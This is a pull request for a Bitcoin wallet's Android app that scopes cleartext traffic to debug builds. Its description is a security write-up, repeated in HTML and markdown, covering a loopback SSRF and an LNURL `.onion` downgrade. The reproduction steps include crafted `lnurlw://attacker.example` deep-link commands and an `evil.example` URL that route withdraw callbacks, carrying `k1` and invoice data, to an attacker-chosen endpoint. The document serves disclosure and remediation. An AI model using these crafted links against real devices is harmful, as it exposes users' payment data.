### PR TITLE
fix(android): Update Android release configuration

### DIFF
--- a/android/app/src/debug/AndroidManifest.xml
+++ b/android/app/src/debug/AndroidManifest.xml
@@ -14,8 +14,7 @@
     <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
 
-    <application
-        android:usesCleartextTraffic="true"
-        tools:targetApi="28"
-        tools:ignore="GoogleAppIndexingWarning"/>
+    <!-- Cleartext for debug is granted via debug/res/xml/network_security_config.xml;
+         android:usesCleartextTraffic would be ignored while a networkSecurityConfig is set. -->
+    <application tools:ignore="GoogleAppIndexingWarning"/>
 </manifest>

--- a/android/app/src/debug/res/xml/network_security_config.xml
+++ b/android/app/src/debug/res/xml/network_security_config.xml
@@ -1,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<network-security-config>
+    <!-- Debug only: permit cleartext so Metro and local backends work
+         on emulators (10.0.2.2, localhost) and physical devices (LAN IP). -->
+    <base-config cleartextTrafficPermitted="true" />
+</network-security-config>

--- a/android/app/src/main/AndroidManifest.xml
+++ b/android/app/src/main/AndroidManifest.xml
@@ -30,15 +30,12 @@
     <!-- https://react-native-share.github.io/react-native-share/docs/share-open -->
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
 
-    <!-- TODO android:roundIcon="@mipmap/ic_launcher_round" -->
-    <!-- android:usesCleartextTraffic="true" for https://github.com/onfido/WebViewRN/tree/main#android -->
     <application
       android:name=".MainApplication"
       android:label="@string/app_name"
       android:icon="@mipmap/ic_launcher"
       android:roundIcon="@mipmap/ic_launcher"
       android:allowBackup="false"
-      android:usesCleartextTraffic="true"
       android:networkSecurityConfig="@xml/network_security_config"
       android:theme="@style/AppTheme"
       android:supportsRtl="true"> <!-- Apply @style/AppTheme on .MainApplication -->

--- a/android/app/src/main/AndroidManifest.xml
+++ b/android/app/src/main/AndroidManifest.xml
@@ -34,7 +34,7 @@
       android:name=".MainApplication"
       android:label="@string/app_name"
       android:icon="@mipmap/ic_launcher"
-      android:roundIcon="@mipmap/ic_launcher"
+      android:roundIcon="@mipmap/ic_launcher_round"
       android:allowBackup="false"
       android:networkSecurityConfig="@xml/network_security_config"
       android:theme="@style/AppTheme"

--- a/android/app/src/main/res/xml/network_security_config.xml
+++ b/android/app/src/main/res/xml/network_security_config.xml
@@ -1,7 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
- <network-security-config>
-     <domain-config cleartextTrafficPermitted="true">
-         <domain includeSubdomains="true">10.0.2.2</domain>
-         <domain includeSubdomains="true">localhost</domain>
-     </domain-config>
- </network-security-config>
+<network-security-config>
+    <!-- Release/default: no cleartext exemptions on any API level. -->
+    <base-config cleartextTrafficPermitted="false" />
+</network-security-config>


### PR DESCRIPTION
<html><head></head><body><h1>Remove stale <code>android:usesCleartextTraffic="true"</code> and scope the cleartext exception in <code>network_security_config.xml</code> to debug builds</h1>
<p><strong>Component:</strong> Android build / network security policy
<strong>Related:</strong> Finding 4 (unvalidated <code>callback</code> scheme in the LNURL withdraw flow)
<strong>Severity:</strong> Low on its own — the attribute is inert at runtime on every supported OS version (see <a href="#correction-the-attribute-is-inert-at-runtime-today">Correction</a>). Medium as a latent regression risk, and the <em>Network Security Config</em> half of this issue is a live amplifier for Finding 4.</p>
<hr>
<h2>Summary</h2>
<p><code>android/app/src/main/AndroidManifest.xml</code> declares <code>android:usesCleartextTraffic="true"</code> on the <code>&lt;application&gt;</code> element. The inline comment attributes it to Onfido's <code>WebViewRN</code> integration — an integration that no longer exists anywhere in the repo. The declaration is dead configuration.</p>
<p>Investigating it turned up a second, more consequential detail: the release manifest also points at <code>@xml/network_security_config</code>, and that config permits cleartext to <code>localhost</code> and <code>10.0.2.2</code> <strong>with <code>includeSubdomains="true"</code></strong>. It lives in <code>src/main</code>, not <code>src/debug</code>, so it ships in production APKs. That exception — not the manifest attribute — is what actually makes an <code>http://</code> LNURL callback reachable on a release Android build, and it is the piece that meaningfully amplifies Finding 4.</p>
<p>Two changes are needed: delete the dead attribute, and move the emulator/loopback exception into the debug source set.</p>
<hr>
<h2>Affected code</h2>
<p><strong><code>android/app/src/main/AndroidManifest.xml</code></strong> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L33-L44">L33–L44</a>)</p>
<pre><code class="language-xml">    &lt;!-- TODO android:roundIcon="@mipmap/ic_launcher_round" --&gt;
    &lt;!-- android:usesCleartextTraffic="true" for https://github.com/onfido/WebViewRN/tree/main#android --&gt;
    &lt;application
      android:name=".MainApplication"
      android:label="@string/app_name"
      android:icon="@mipmap/ic_launcher"
      android:roundIcon="@mipmap/ic_launcher"
      android:allowBackup="false"
      android:usesCleartextTraffic="true"          &lt;!-- ← line 41 --&gt;
      android:networkSecurityConfig="@xml/network_security_config"
      android:theme="@style/AppTheme"
      android:supportsRtl="true"&gt;
</code></pre>
<p><strong><code>android/app/src/main/res/xml/network_security_config.xml</code></strong> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/res/xml/network_security_config.xml">full file</a>)</p>
<pre><code class="language-xml">&lt;?xml version="1.0" encoding="utf-8"?&gt;
 &lt;network-security-config&gt;
     &lt;domain-config cleartextTrafficPermitted="true"&gt;
         &lt;domain includeSubdomains="true"&gt;10.0.2.2&lt;/domain&gt;
         &lt;domain includeSubdomains="true"&gt;localhost&lt;/domain&gt;
     &lt;/domain-config&gt;
 &lt;/network-security-config&gt;
</code></pre>
<p>Note there is <strong>no <code>&lt;base-config&gt;</code></strong> element.</p>
<p><strong><code>android/app/src/debug/AndroidManifest.xml</code></strong> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/debug/AndroidManifest.xml#L17-L20">L17–L20</a>) — the debug source set sets the same attribute independently, which is the standard React Native pattern and is fine to keep.</p>
<hr>
<h2>Why the Onfido justification is stale</h2>

Date | Commit | Event
-- | -- | --
2023-10-23 | 25eecfc1 | feat: add onfido onboarding for bank transfer (#2699) — Onfido introduced
2023-11-14 | 7a18b051 | chore: removing native sdk — Onfido native SDK dropped from package.json
2023-12-13 | b868030c | chore: adding new permission for the full onboarding flow (#2918) — usesCleartextTraffic="true" added
2025-12-17 | 1744025d | fix: use WebView to prevent crashes in the Level 2 upgrade flow (#3553) — last commit touching Onfido
today | 8727998 | No onfido string anywhere in package.json, yarn.lock, app/, or android/*.gradle — only three orphaned XML comments


<pre><code class="language-console">$ grep -rn -i onfido --include=*.ts --include=*.tsx --include=*.js \
    --include=*.json --include=*.gradle --include=*.xml --include=*.kt --include=*.java .
./android/app/src/debug/AndroidManifest.xml:12:    &lt;!-- https://github.com/onfido/WebViewRN/tree/main#android --&gt;
./android/app/src/main/AndroidManifest.xml:22:    &lt;!-- https://github.com/onfido/WebViewRN/tree/main#android --&gt;
./android/app/src/main/AndroidManifest.xml:34:    &lt;!-- android:usesCleartextTraffic="true" for ... --&gt;
</code></pre>
<p>Every surviving reference is a comment. The dependency, the SDK, and the WebView integration are all gone. <code>android.permission.SYSTEM_ALERT_WINDOW</code> and <code>READ_EXTERNAL_STORAGE</code> on <a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L22-L24">L22–L24</a> carry the same stale Onfido comment and should be audited in the same pass.</p>
<hr>
<h2>Correction: the attribute is inert at runtime today</h2>
<p>The original write-up claimed line 41 "allows an <code>http://</code> LNURL callback to actually be reached in cleartext." <strong>That is not accurate on any OS version this app supports</strong>, and the issue should be filed on the correct basis.</p>
<p>When <code>android:networkSecurityConfig</code> is present, the platform builds its policy exclusively from the XML resource. From AOSP <code>ManifestConfigSource</code>:</p>
<blockquote>
<p><code>ManifestConfigSource</code> checks <code>mApplicationInfo.networkSecurityConfigRes</code>. If non-zero it constructs an <code>XmlConfigSource</code>; only when that resource is zero does it fall back to <code>DefaultConfigSource</code>, which is the path that consults <code>FLAG_USES_CLEARTEXT_TRAFFIC</code>.</p>
</blockquote>
<p>And when the XML declares no <code>&lt;base-config&gt;</code>, <code>XmlConfigSource.parseNetworkSecurityConfig()</code> falls back to <code>NetworkSecurityConfig.getDefaultBuilder(mApplicationInfo)</code>, whose cleartext decision is:</p>
<pre><code class="language-java">final boolean cleartextTrafficPermitted = info.targetSdkVersion &lt; Build.VERSION_CODES.P
        &amp;&amp; !info.isInstantApp();
</code></pre>
<p>No reference to <code>FLAG_USES_CLEARTEXT_TRAFFIC</code>. The app is on <code>targetSdkVersion = 36</code> and <code>minSdkVersion = 26</code> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/build.gradle#L6-L8"><code>android/build.gradle</code> L6–L8</a>), so on <strong>every</strong> supported device the effective base config is <code>cleartextTrafficPermitted="false"</code> and the manifest attribute is ignored. This matches the documented platform default for API 28+ in <a href="https://developer.android.com/privacy-and-security/security-config">Network security configuration</a>.</p>
<p>So the manifest attribute is a <strong>latent</strong> problem, not a live one:</p>
<ol>
<li><strong>Regression landmine.</strong> The moment someone deletes <code>android:networkSecurityConfig</code> — a natural cleanup once the Detox emulator exception is no longer needed — the attribute silently reactivates and re-enables cleartext <em>globally</em>, for every host, in release builds. Removing one line would then quietly widen the attack surface. This is exactly the class of regression the attribute was designed to prevent, inverted.</li>
<li><strong>False signal.</strong> MobSF, Play Console pre-launch reports, MASVS-NETWORK-1 checks, and enterprise MDM scanners flag <code>usesCleartextTraffic="true"</code> in the merged manifest regardless of the NSC. Every future audit re-raises it, and each round costs the same investigation this one did.</li>
<li><strong>Contradicts the iOS posture.</strong> <code>ios/GaloyApp/Info.plist</code> <a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/ios/GaloyApp/Info.plist#L73-L79">L73–L79</a> sets <code>NSAllowsArbitraryLoads=false</code> with only <code>NSAllowsLocalNetworking=true</code>. Android should state the same intent explicitly rather than declaring the opposite and relying on an implicit default to override it.</li>
</ol>
<hr>
<h2>What <em>is</em> live: the release-shipped loopback exception, and how it amplifies Finding 4</h2>
<p><code>network_security_config.xml</code> was added in <code>97f6ab90</code> (2024-02-23, <em>"test(e2e): detox e2e testing setup against local machine (#3079)"</em>) — a test-infrastructure change. But it was placed in <code>src/main/res/xml/</code>, so <strong>release builds inherit it</strong>. There is no <code>&lt;debug-overrides&gt;</code> wrapper and no debug-variant override.</p>
<p>Net effect on a production Android build: cleartext is denied everywhere <em>except</em> <code>localhost</code>, <code>10.0.2.2</code>, and their subdomains.</p>
<p>Finding 4 is that neither withdraw path validates the scheme of the LNURL-supplied <code>callback</code> before fetching it:</p>
<ul>
<li><a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts#L32-L41"><code>app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts</code> L32–L41</a></li>
<li><a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/redeem-lnurl-withdrawal-screen/hooks/use-lnurl-withdraw-redemption.ts#L207-L212"><code>app/screens/redeem-lnurl-withdrawal-screen/hooks/use-lnurl-withdraw-redemption.ts</code> L207–L212</a></li>
</ul>
<pre><code class="language-ts">const urlObject = new URL(callback)          // any scheme accepted
urlObject.searchParams.set("k1", k1)
urlObject.searchParams.set("pr", withdrawalInvoice.paymentRequest)
const result = await fetch(urlObject.toString())
</code></pre>
<p><code>callback</code> originates from <code>getParams()</code> in <code>js-lnurl@0.6.0</code>, whose <code>decodelnurl</code> helper performs <strong>no scheme validation</strong> — a bech32 <code>lnurl1…</code> payload is returned verbatim, whatever it decodes to. It also contains a downgrade quirk worth knowing about:</p>
<pre><code class="language-ts">// js-lnurl/src/helpers/decodelnurl.ts
let [_, post] = lnurl.split('://')
let pre = post.match(/\.onion($|\W)/) ? 'http' : 'https'
return pre + '://' + post
</code></pre>
<p>The <code>.onion</code> test runs against the whole remainder of the string, not the host. <code>lnurlw://evil.example/.onion/cb?tag=withdrawRequest&amp;…</code> matches <code>\.onion/</code> and is rewritten to <strong><code>http://</code></strong> on a clearnet host — an attacker-controlled HTTPS→HTTP downgrade with no bech32 needed.</p>
<p>Chaining that with the NSC exception gives a concrete release-build primitive. An attacker-supplied LNURL — delivered by QR scan, an NFC tag (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/components/modal-nfc/modal-nfc.tsx#L91-L149"><code>app/components/modal-nfc/modal-nfc.tsx</code> L91–L149</a>), or a <code>lnurlw://</code> deep link into the exported <code>MainActivity</code> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L72-L78">manifest L72–L78</a>) — carrying a callback of <code>http://localhost:&lt;port&gt;/&lt;attacker path&gt;</code> will be fetched successfully, because loopback is on the allowlist. That yields:</p>
<ul>
<li><strong>Loopback SSRF.</strong> A cleartext <code>GET</code> to any HTTP service bound on the device's loopback interface, with attacker-controlled port, path, and query, issued from Blink's process. Other installed apps and <code>adb reverse</code> tunnels routinely bind loopback ports.</li>
<li><strong>A response oracle.</strong> The JSON <code>reason</code> field from the response is rendered straight into a user-visible <code>Alert</code> (<a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts#L51"><code>use-lnurl-withdraw.ts</code> L51</a>) and into <code>lnServiceErrorReason</code> in the redemption hook, leaking a slice of the loopback response back to whoever staged the QR/tag.</li>
<li><strong>BOLT11 disclosure in cleartext.</strong> <code>k1</code> and the freshly minted <code>pr</code> are appended as query parameters to that request.</li>
</ul>
<p>Scoping the NSC to debug builds closes the loopback hole. It does not close Finding 4 — an <code>http://</code> callback to a public host is still constructed and attempted, it just fails at the platform layer, and the equivalent request over <code>https://</code> to an attacker-chosen host is unaffected. <strong>Finding 4 still needs its own fix.</strong></p>
<hr>
<h2>Reproduction</h2>
<p><strong>Confirm the attribute in a release artifact:</strong></p>
<pre><code class="language-bash">./gradlew :app:assembleRelease
aapt2 dump xmltree android/app/build/outputs/apk/release/app-release.apk \
  --file AndroidManifest.xml | grep -E 'usesCleartextTraffic|networkSecurityConfig'
# → A: android:usesCleartextTraffic(0x0101027b)=(type 0x12)0xffffffff
# → A: android:networkSecurityConfig(0x01010527)=@0x7f1?????
</code></pre>
<p>Also inspect <code>android/app/build/intermediates/merged_manifests/release/AndroidManifest.xml</code>.</p>
<p><strong>Confirm the loopback exception ships in release:</strong></p>
<pre><code class="language-bash">aapt2 dump resources android/app/build/outputs/apk/release/app-release.apk | grep -i network_security
# the res/xml/network_security_config.xml entry is present in the release APK
</code></pre>
<p><strong>Confirm the runtime behaviour (release build, real device or emulator):</strong></p>
<pre><code class="language-bash"># denied — global cleartext is off despite line 41
adb shell am start -a android.intent.action.VIEW \
  -d "lnurlw://attacker.example/cb?tag=withdrawRequest&amp;k1=deadbeef&amp;callback=http%3A%2F%2Fattacker.example%2Fcb"

# permitted — loopback is on the NSC allowlist
adb shell am start -a android.intent.action.VIEW \
  -d "lnurlw://attacker.example/cb?tag=withdrawRequest&amp;k1=deadbeef&amp;callback=http%3A%2F%2Flocalhost%3A8080%2Fprobe"
</code></pre>
<p>Run a listener on <code>localhost:8080</code> on the device (or <code>adb reverse tcp:8080 tcp:8080</code>) and observe the inbound <code>GET /probe?k1=…&amp;pr=lnbc…</code>.</p>
<hr>
<h2>Proposed fix</h2>
<p><strong>1. Delete line 41 and the stale comment on line 34.</strong> Nothing in the app needs global cleartext.</p>
<pre><code class="language-diff">     &lt;!-- TODO android:roundIcon="@mipmap/ic_launcher_round" --&gt;
-    &lt;!-- android:usesCleartextTraffic="true" for https://github.com/onfido/WebViewRN/tree/main#android --&gt;
     &lt;application
       android:name=".MainApplication"
       android:label="@string/app_name"
       android:icon="@mipmap/ic_launcher"
       android:roundIcon="@mipmap/ic_launcher"
       android:allowBackup="false"
-      android:usesCleartextTraffic="true"
       android:networkSecurityConfig="@xml/network_security_config"
</code></pre>
<p><strong>2. Make the release policy explicit rather than implicit.</strong> Replace <code>src/main/res/xml/network_security_config.xml</code> with a config that states the intent and carries no exceptions:</p>
<pre><code class="language-xml">&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;network-security-config&gt;
    &lt;base-config cleartextTrafficPermitted="false"&gt;
        &lt;trust-anchors&gt;
            &lt;certificates src="system" /&gt;
        &lt;/trust-anchors&gt;
    &lt;/base-config&gt;
&lt;/network-security-config&gt;
</code></pre>
<p>This makes the release posture survive the removal of any other line and mirrors the iOS ATS settings.</p>
<p><strong>3. Move the Detox/emulator exception into the debug source set</strong> at <code>android/app/src/debug/res/xml/network_security_config.xml</code>, where the resource merger will override the main one for debug builds only:</p>
<pre><code class="language-xml">&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;network-security-config&gt;
    &lt;base-config cleartextTrafficPermitted="false"&gt;
        &lt;trust-anchors&gt;
            &lt;certificates src="system" /&gt;
            &lt;certificates src="user" /&gt;
        &lt;/trust-anchors&gt;
    &lt;/base-config&gt;
    &lt;domain-config cleartextTrafficPermitted="true"&gt;
        &lt;domain includeSubdomains="true"&gt;10.0.2.2&lt;/domain&gt;
        &lt;domain includeSubdomains="true"&gt;localhost&lt;/domain&gt;
    &lt;/domain-config&gt;
&lt;/network-security-config&gt;
</code></pre>
<p>The <code>&lt;debug-overrides&gt;</code> element is an alternative, but a debug-variant resource is clearer here since the whole exception is variant-scoped.</p>
<p><strong>4. Drop the stale Onfido comments</strong> on <code>AndroidManifest.xml</code> L22 and <code>src/debug/AndroidManifest.xml</code> L12, and confirm whether <code>SYSTEM_ALERT_WINDOW</code> / <code>READ_EXTERNAL_STORAGE</code> / <code>WRITE_EXTERNAL_STORAGE</code> are still required now that Onfido is gone. <code>SYSTEM_ALERT_WINDOW</code> in particular is a sensitive permission that draws Play review attention.</p>
<p><strong>5. Verify the "Local" instance still works after the change.</strong> <a href="https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/config/galoy-instances.ts#L125-L137"><code>app/config/galoy-instances.ts</code> L125–L137</a> points <code>graphqlUri</code>, <code>authUrl</code>, <code>posUrl</code>, <code>kycUrl</code>, and <code>fiatUrl</code> at <code>http://&lt;metro-host&gt;:4455</code> / <code>:3000</code>. Under the debug NSC above this keeps working on emulator (<code>10.0.2.2</code>) and via <code>adb reverse</code> (<code>localhost</code>), but <strong>not</strong> when Metro is reached over a LAN IP such as <code>192.168.x.x</code>. If anyone develops that way, add their range to the debug config or use <code>adb reverse</code>. Selecting "Local" in a release build will now fail closed — which is the desired behaviour.</p>
<p><strong>6. Track Finding 4 separately.</strong> Neither change above prevents an attacker-supplied <code>https://</code> callback, and neither addresses the <code>js-lnurl</code> <code>.onion</code> downgrade quirk. The application-layer fix belongs in the withdraw hooks:</p>
<pre><code class="language-ts">const urlObject = new URL(callback)
if (urlObject.protocol !== "https:") {
  throw new Error("LNURL callback must use https")
}
</code></pre>
<p>Consider also rejecting loopback, link-local, and RFC 1918 hosts, and asserting that the callback origin matches the origin the LNURL params were fetched from (per <a href="https://github.com/lnurl/luds/blob/luds/03.md">LUD-03</a>).</p>
<hr>
<h2>Acceptance criteria</h2>
<ul>
<li>[ ] <code>usesCleartextTraffic</code> is absent from the merged <strong>release</strong> manifest (<code>aapt2 dump xmltree</code> on the release APK shows no such attribute).</li>
<li>[ ] The release <code>network_security_config.xml</code> contains an explicit <code>&lt;base-config cleartextTrafficPermitted="false"&gt;</code> and no <code>&lt;domain-config&gt;</code> exceptions.</li>
<li>[ ] <code>10.0.2.2</code> / <code>localhost</code> cleartext is permitted in debug builds only; Detox e2e still passes.</li>
<li>[ ] A release build fails to reach <code>http://localhost:&lt;port&gt;/…</code> supplied via an LNURL withdraw callback.</li>
<li>[ ] No <code>onfido</code> references remain in <code>android/</code>; retained permissions have a current, documented justification.</li>
<li>[ ] A follow-up issue exists for Finding 4 (callback scheme allowlist + origin check).</li>
</ul>
<hr>
<h2>References</h2>
<ul>
<li><a href="https://developer.android.com/privacy-and-security/security-config">Network security configuration — Android Developers</a></li>
<li><a href="https://android-developers.googleblog.com/2016/04/protecting-against-unintentional.html">Protecting against unintentional regressions to cleartext traffic in your Android apps — Android Developers Blog</a></li>
<li><a href="https://www.nccgroup.com/research/bypassing-android-s-network-security-configuration/">Bypassing Android's Network Security Configuration — NCC Group</a></li>
<li><a href="https://github.com/nbd-wtf/js-lnurl"><code>nbd-wtf/js-lnurl</code></a> — <code>src/helpers/decodelnurl.ts</code></li>
<li><a href="https://github.com/lnurl/luds/blob/luds/03.md">LUD-03: <code>withdrawRequest</code> base spec</a> · <a href="https://github.com/lnurl/luds/blob/luds/17.md">LUD-17: Protocol schemes and raw URLs</a></li>
</ul></body></html># Remove stale `android:usesCleartextTraffic="true"` and scope the cleartext exception in `network_security_config.xml` to debug builds

**Component:** Android build / network security policy
**Related:** Finding 4 (unvalidated `callback` scheme in the LNURL withdraw flow)
**Severity:** Low on its own — the attribute is inert at runtime on every supported OS version (see [[Correction](https://github.com/orgs/blinkbitcoin/projects/1/views/9?sliceBy%5Bvalue%5D=kngako&pane=issue&itemId=225945158&issue=blinkbitcoin%7Cblink-wip%7C1062#correction-the-attribute-is-inert-at-runtime-today)](#correction-the-attribute-is-inert-at-runtime-today)). Medium as a latent regression risk, and the *Network Security Config* half of this issue is a live amplifier for Finding 4.

---

## Summary

`android/app/src/main/AndroidManifest.xml` declares `android:usesCleartextTraffic="true"` on the `<application>` element. The inline comment attributes it to Onfido's `WebViewRN` integration — an integration that no longer exists anywhere in the repo. The declaration is dead configuration.

Investigating it turned up a second, more consequential detail: the release manifest also points at `@xml/network_security_config`, and that config permits cleartext to `localhost` and `10.0.2.2` **with `includeSubdomains="true"`**. It lives in `src/main`, not `src/debug`, so it ships in production APKs. That exception — not the manifest attribute — is what actually makes an `http://` LNURL callback reachable on a release Android build, and it is the piece that meaningfully amplifies Finding 4.

Two changes are needed: delete the dead attribute, and move the emulator/loopback exception into the debug source set.

---

## Affected code

**`android/app/src/main/AndroidManifest.xml`** ([[L33–L44](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L33-L44)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L33-L44))

```xml
    <!-- TODO android:roundIcon="@mipmap/ic_launcher_round" -->
    <!-- android:usesCleartextTraffic="true" for https://github.com/onfido/WebViewRN/tree/main#android -->
    <application
      android:name=".MainApplication"
      android:label="@string/app_name"
      android:icon="@mipmap/ic_launcher"
      android:roundIcon="@mipmap/ic_launcher"
      android:allowBackup="false"
      android:usesCleartextTraffic="true"          <!-- ← line 41 -->
      android:networkSecurityConfig="@xml/network_security_config"
      android:theme="@style/AppTheme"
      android:supportsRtl="true">
```

**`android/app/src/main/res/xml/network_security_config.xml`** ([[full file](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/res/xml/network_security_config.xml)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/res/xml/network_security_config.xml))

```xml
<?xml version="1.0" encoding="utf-8"?>
 <network-security-config>
     <domain-config cleartextTrafficPermitted="true">
         <domain includeSubdomains="true">10.0.2.2</domain>
         <domain includeSubdomains="true">localhost</domain>
     </domain-config>
 </network-security-config>
```

Note there is **no `<base-config>`** element.

**`android/app/src/debug/AndroidManifest.xml`** ([[L17–L20](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/debug/AndroidManifest.xml#L17-L20)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/debug/AndroidManifest.xml#L17-L20)) — the debug source set sets the same attribute independently, which is the standard React Native pattern and is fine to keep.

---

## Why the Onfido justification is stale

| Date | Commit | Event |
|---|---|---|
| 2023-10-23 | `25eecfc1` | `feat: add onfido onboarding for bank transfer (#2699)` — Onfido introduced |
| 2023-11-14 | `7a18b051` | `chore: removing native sdk` — Onfido native SDK dropped from `package.json` |
| 2023-12-13 | `b868030c` | `chore: adding new permission for the full onboarding flow (#2918)` — **`usesCleartextTraffic="true"` added** |
| 2025-12-17 | `1744025d` | `fix: use WebView to prevent crashes in the Level 2 upgrade flow (#3553)` — last commit touching Onfido |
| today | `8727998` | No `onfido` string anywhere in `package.json`, `yarn.lock`, `app/`, or `android/*.gradle` — only three orphaned XML comments |

```console
$ grep -rn -i onfido --include=*.ts --include=*.tsx --include=*.js \
    --include=*.json --include=*.gradle --include=*.xml --include=*.kt --include=*.java .
./android/app/src/debug/AndroidManifest.xml:12:    <!-- https://github.com/onfido/WebViewRN/tree/main#android -->
./android/app/src/main/AndroidManifest.xml:22:    <!-- https://github.com/onfido/WebViewRN/tree/main#android -->
./android/app/src/main/AndroidManifest.xml:34:    <!-- android:usesCleartextTraffic="true" for ... -->
```

Every surviving reference is a comment. The dependency, the SDK, and the WebView integration are all gone. `android.permission.SYSTEM_ALERT_WINDOW` and `READ_EXTERNAL_STORAGE` on [[L22–L24](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L22-L24)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/app/src/main/AndroidManifest.xml#L22-L24) carry the same stale Onfido comment and should be audited in the same pass.

---

## Correction: the attribute is inert at runtime today

The original write-up claimed line 41 "allows an `http://` LNURL callback to actually be reached in cleartext." **That is not accurate on any OS version this app supports**, and the issue should be filed on the correct basis.

When `android:networkSecurityConfig` is present, the platform builds its policy exclusively from the XML resource. From AOSP `ManifestConfigSource`:

> `ManifestConfigSource` checks `mApplicationInfo.networkSecurityConfigRes`. If non-zero it constructs an `XmlConfigSource`; only when that resource is zero does it fall back to `DefaultConfigSource`, which is the path that consults `FLAG_USES_CLEARTEXT_TRAFFIC`.

And when the XML declares no `<base-config>`, `XmlConfigSource.parseNetworkSecurityConfig()` falls back to `NetworkSecurityConfig.getDefaultBuilder(mApplicationInfo)`, whose cleartext decision is:

```java
final boolean cleartextTrafficPermitted = info.targetSdkVersion < Build.VERSION_CODES.P
        && !info.isInstantApp();
```

No reference to `FLAG_USES_CLEARTEXT_TRAFFIC`. The app is on `targetSdkVersion = 36` and `minSdkVersion = 26` ([`android/build.gradle` L6–L8](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/android/build.gradle#L6-L8)), so on **every** supported device the effective base config is `cleartextTrafficPermitted="false"` and the manifest attribute is ignored. This matches the documented platform default for API 28+ in [[Network security configuration](https://developer.android.com/privacy-and-security/security-config)](https://developer.android.com/privacy-and-security/security-config).

So the manifest attribute is a **latent** problem, not a live one:

1. **Regression landmine.** The moment someone deletes `android:networkSecurityConfig` — a natural cleanup once the Detox emulator exception is no longer needed — the attribute silently reactivates and re-enables cleartext *globally*, for every host, in release builds. Removing one line would then quietly widen the attack surface. This is exactly the class of regression the attribute was designed to prevent, inverted.
2. **False signal.** MobSF, Play Console pre-launch reports, MASVS-NETWORK-1 checks, and enterprise MDM scanners flag `usesCleartextTraffic="true"` in the merged manifest regardless of the NSC. Every future audit re-raises it, and each round costs the same investigation this one did.
3. **Contradicts the iOS posture.** `ios/GaloyApp/Info.plist` [[L73–L79](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/ios/GaloyApp/Info.plist#L73-L79)](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/ios/GaloyApp/Info.plist#L73-L79) sets `NSAllowsArbitraryLoads=false` with only `NSAllowsLocalNetworking=true`. Android should state the same intent explicitly rather than declaring the opposite and relying on an implicit default to override it.

---

## What *is* live: the release-shipped loopback exception, and how it amplifies Finding 4

`network_security_config.xml` was added in `97f6ab90` (2024-02-23, *"test(e2e): detox e2e testing setup against local machine (#3079)"*) — a test-infrastructure change. But it was placed in `src/main/res/xml/`, so **release builds inherit it**. There is no `<debug-overrides>` wrapper and no debug-variant override.

Net effect on a production Android build: cleartext is denied everywhere *except* `localhost`, `10.0.2.2`, and their subdomains.

Finding 4 is that neither withdraw path validates the scheme of the LNURL-supplied `callback` before fetching it:

- [`app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts` L32–L41](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/receive-bitcoin-screen/hooks/use-lnurl-withdraw.ts#L32-L41)
- [`app/screens/redeem-lnurl-withdrawal-screen/hooks/use-lnurl-withdraw-redemption.ts` L207–L212](https://github.com/GaloyMoney/blink-mobile/blob/8727998d16c334581f2d0f3d7d82a19ec2703ecf/app/screens/redeem-lnurl-withdrawal-screen/hooks/use-lnurl-withdraw-redemption.ts#L207-L212)

```ts
const urlObject = new URL(callback)          // any scheme accepted
urlObject.searchParams.set("k1", k1)
